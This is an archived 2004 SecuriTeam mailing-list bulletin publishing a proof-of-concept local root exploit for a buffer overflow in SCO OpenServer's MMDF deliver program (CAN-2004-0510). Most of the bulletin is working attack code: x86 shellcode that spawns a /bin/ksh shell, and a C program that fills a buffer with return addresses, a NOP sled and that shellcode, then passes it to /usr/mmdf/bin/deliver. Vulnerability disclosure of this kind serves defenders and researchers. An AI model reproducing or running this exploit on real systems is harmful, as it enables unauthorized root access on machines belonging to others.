[EXPL] SCO OpenServer MMDF Deliver Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 11/07/04

    To: list@securiteam.com
    Date: 7 Nov 2004 14:41:36 +0200

    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      SCO OpenServer MMDF Deliver Buffer Overflow

    SUMMARY

    Below is a proof of concept code for a buffer overflow in SCO OpenServer
    MMDF deliver.

    DETAILS

    Vulnerable Systems:
     * SCO OpenServer version 5.0.6
     * SCO OpenServer 5.0.7

    CVE Information:
     <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0510>
    CAN-2004-0510

    Proof of Concept Code:
    /*
     *MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
     *Copyright 2004 Ramon de Carvalho Valle
     *
     */

    char shellcode[]= /*36 bytes*/
        "\x68\xff\xf8\xff\x3c"/*pushl $0x3cfff8ff */
        "\x6a\x65"/*pushl $0x65 */
        "\x89\xe6"/*movl%esp,%esi */
        "\xf7\x56\x04"/*notl0x04(%esi)*/
        "\xf6\x16"/*notb(%esi)*/
        "\x31\xc0"/*xorl%eax,%eax */
        "\x50"/*pushl %eax*/
        "\x68""/ksh"/*pushl $0x68736b2f */
        "\x68""/bin"/*pushl $0x6e69622f */
        "\x89\xe3"/*movl%esp,%ebx */
        "\x50"/*pushl %eax*/
        "\x50"/*pushl %eax*/
        "\x53"/*pushl %ebx*/
        "\xb0\x3b"/*movb$0x3b,%al */
        "\xff\xd6"/*call*%esi */
    ;

    main(int argc,char **argv) {
        char buffer[16384],address[4],*p;
        int i;

        printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7
    x86\n");
        printf("Copyright 2004 Ramon de Carvalho Valle\n\n");

        *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

        sprintf(buffer,"-c");
        p=buffer+2;
        for(i=0;i<5120;i++) *p++=address[i%4];
        for(i=0;i<8192;i++) *p++=0x90;
        for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
        *p=0;

        execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
    }

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:ramondecarvalho@yahoo.com.br> Ramon de Carvalho Valle.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    • [EXPL] SCO Openserver termsh Local Privilege Escalation (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SCO Openserver termsh Local Privilege Escalation ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] SCO Openserver termsh Privileges Escalation (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability on SCO Openserver allows attackers to gain access to the ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] TinyWeb Server DoS Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] 3Com FTP Server Buffer Overflow (CD)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)